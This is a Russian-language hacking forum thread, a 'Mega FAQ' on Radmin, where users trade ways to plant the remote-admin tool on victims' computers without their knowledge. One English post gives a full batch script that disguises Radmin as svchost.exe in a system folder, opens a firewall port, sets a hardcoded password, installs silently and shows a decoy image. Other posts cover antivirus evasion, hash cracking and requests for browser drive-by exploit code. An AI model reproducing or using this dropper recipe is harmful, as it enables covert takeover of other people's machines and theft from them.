Mega FAQ по Radmin'у

Discussion in 'Soft - Windows' started by Elekt, 29 Jan 2006.

  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    PasswordsPro начиная с версии 2.4.0.0 теперь брутит хэши от RAdmin версий 2.x
     
    _________________________
    1 person likes this.
  2. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,784
    Likes Received:
    1,218
    Reputations:
    704
    Читай статью Лебедя "Троян от мелкомягких".
     
  3. nikotin

    nikotin New Member

    Joined:
    3 Oct 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а есть возможность приконектиться RAdmin, если комп жертва за NAT?
     
  4. nikotin

    nikotin New Member

    Joined:
    3 Oct 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    нет? :-(
     
  5. Kиt

    Kиt New Member

    Joined:
    4 Aug 2006
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -3
    спасибо прочитал. а как поднять на 2003 или 2000 ?
     
  6. [MatriX]

    [MatriX] New Member

    Joined:
    1 Jan 2007
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    КТо реально может не много уделить времени на пару вопросов по етой проге,напишыте свою аську плс!
     
  7. Zero Coo!

    Zero Coo! New Member

    Joined:
    26 Feb 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Тема просто Мега Супер !!!!!! Можете мне дать если есть или найти Serial№; На Радмин 3.0 ПЛИЗ
     
  8. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    Zero Coo!, зарегестрируйстесь на торренте, вот прямая ссылка http://torrents.ru/forum/viewtopic.php?t=303101
     
  9. engvaliys

    engvaliys New Member

    Joined:
    9 Dec 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Люди у меня есть вопрос, Radmin 2.1 покатит под висту ? или ещё вопрос, можете подсказать какой либо трой под висту :) ???
     
  10. Chakir

    Chakir Elder - Старейшина

    Joined:
    17 Apr 2006
    Messages:
    34
    Likes Received:
    7
    Reputations:
    0
    покатит !!! под висту
     
  11. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    вот радмин v2.2, выдрал из ZverCD , запускается в режиме тихой установки с ключом s , авирами не палиться ( палиться только Каспером когда конектишься через Telnet , мол ввод и вывод данных и тд ) с иконкой в трее можно поработать через ResHacker , и тд и тп . http://slil.ru/25363523
     
    #111 Belfigor, 16 Jan 2008
    Last edited: 16 Jan 2008
  12. mentalfuck

    mentalfuck New Member

    Joined:
    17 Aug 2007
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Дайте код javascript который может скачать с любого сайта exe файл и запустить его без ведома жертвы
     
    #112 mentalfuck, 28 Jan 2008
    Last edited: 29 Jan 2008
  13. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    такой код стоит деньги))) название таких кодов сплоиты под бравзера.. посмотри в топике продажа.
     
  14. }I{ek

    }I{ek New Member

    Joined:
    8 Feb 2008
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Супер!
     
  15. maximusb

    maximusb New Member

    Joined:
    11 Mar 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите. Скачал архив, тот который http://sec-123.narod.ru/radmin/6.rar Установил у жертвы дома (запускал и огни.exe и config.bat Запускаю у себя R Viewer 3.0... Пишет "Не удается соединиться с сервером" И так пробовал на разных машинах... Везде одно и то же... Помогите плиз... Стукните в аську... 213887672
     
  16. eazy

    eazy New Member

    Joined:
    15 Jan 2008
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    Hello ,

    This is some tweak for Radmin i make myself
    1.Get Radmin files from this post
    2.Get compiler
    3.Compilee Radmin files with needed files
    4.Add some icon and invisibility for .exe
    What's happen when you run the compiled .exe

    Code:
    mkdir %SYSTEMROOT%\help\Tours\nnTour
    
    copy /y "%MYFILES%\svchost.exe" "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe"
    
    copy /y "%MYFILES%\raddrv.dll" "%SYSTEMROOT%/help/Tours/nnTour/raddrv.dll"
    
    copy /y "%MYFILES%\AdmDll.dll" "%SYSTEMROOT%/help/Tours/nnTour/AdmDll.dll"
    
    copy /y "%MYFILES%\111.bat" "%SYSTEMROOT%/help/Tours/nnTour/111.bat"
    
    copy /y "%MYFILES%\111.reg" "%SYSTEMROOT%/help/Tours/nnTour/111.reg"
    
    netsh firewall add portopening protocol = TCP port = 53221 name = TCP
    
    reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
    
    reg delete  "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
    
    reg import "%SYSTEMROOT%/help/Tours/nnTour/111.reg
    
    regedit /s "%SYSTEMROOT%/help/Tours/nnTour/111.reg
    
    "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /install /silence
    
    "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
    "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /start
    
    "%MYFILES%\1.jpg"
    1. Make folder %SYSTEMROOT%\help\Tours\nnTour
    2.Copy all needed files in %SYSTEMROOT%\help\Tours\nnTour
    3.Open MS firewall with name "TCP" and port "53221"
    netsh firewall add portopening protocol = TCP port = 32554 name = TCP

    4.Import needed registry
    5.Install radmin save everything use silence for icon and pass r1st0n and port 53221
    - "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
    - Start Radmin server
    6.Open 1.jpg
    When user run the exe at end after 1-2 sec.s he see the 1.jpg
    You can make some tweeks to delete the reg and .bat files after install

    With quick.batch.file.compiler you can import little files this was perfect to import :
    svchost.exe ,raddrv.dll,AdmDll.dll,111.bat,111.reg,

    Next thing is if someone can help is how to import some script or report how will give me the victim IP address for example if someone download it from HTTP and run it how to see the victim IP if someone can help I will be glad

    Greetings


    RADMIN FILES
     
  17. muhaha

    muhaha New Member

    Joined:
    30 Mar 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ПОмогите пожалуста найти сплоит ms04011.exe/// всё обыскал не могу найти
     
  18. Glynec

    Glynec Elder - Старейшина

    Joined:
    30 Jan 2008
    Messages:
    68
    Likes Received:
    25
    Reputations:
    2
    Спс +
     
  19. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,857
    Likes Received:
    1,962
    Reputations:
    594
    Скорее всего она за NAT и сервер Радмина не доступен через Инет.
    Если у неё ADSL - так скорее всего и есть. (надо настраивать редирект портов в конфигураторе модема, либо поставить его в режим роутер).
     
    1 person likes this.
  20. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    135
    Likes Received:
    62
    Reputations:
    15
    Как подключиться к серверу Радмина если он за Nat? насколько я понимаю надо создать туннель на другой серв и через него пустить Радмина, а самому коннектится уже к тому серву через который пустил Радмина.... Если я правильно мыслю, то как это реализовать?
     
Loading...
Similar Threads - Mega Radmin'у
  1. Tip.the.besT
    Replies:
    0
    Views:
    1,582